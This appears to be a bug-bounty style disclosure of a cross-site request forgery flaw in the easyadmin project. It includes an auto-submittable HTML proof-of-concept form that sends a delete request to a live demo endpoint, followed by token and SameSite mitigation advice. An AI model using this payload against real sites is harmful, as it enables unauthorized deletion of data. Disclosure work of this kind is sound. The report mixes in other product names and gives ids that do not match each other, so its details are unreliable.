Cross-Site Request Forgery (CSRF) in zhongshaofa/easyadmin
Aug 4th 2021
Attacker able to delete any local picture with CSRF attack.
It does not matter at all that phproject run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of filebrowser application.
It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.
🕵️♂️ Proof of Concept
1.fisrt user already should be logged in In Firefox or safari.
2.Open the PoC.html and click on submit button ( Also it can be auto-submit)
3.Here a local picture with id
2885 will be deleted after clicking on submit button on PoC.html file.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://easyadmin.99php.cn/admindemo/system.menu/del" method="POST"> <input type="hidden" name="id" value="244" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Also for real attacks the submit button can be auto-submit.
This vulnerability is capable of delete any local picture.
set a token with a length bigger that 16 characters in every requests body then attacker never can guess the url.
Also you cat turn
Strict in cookies.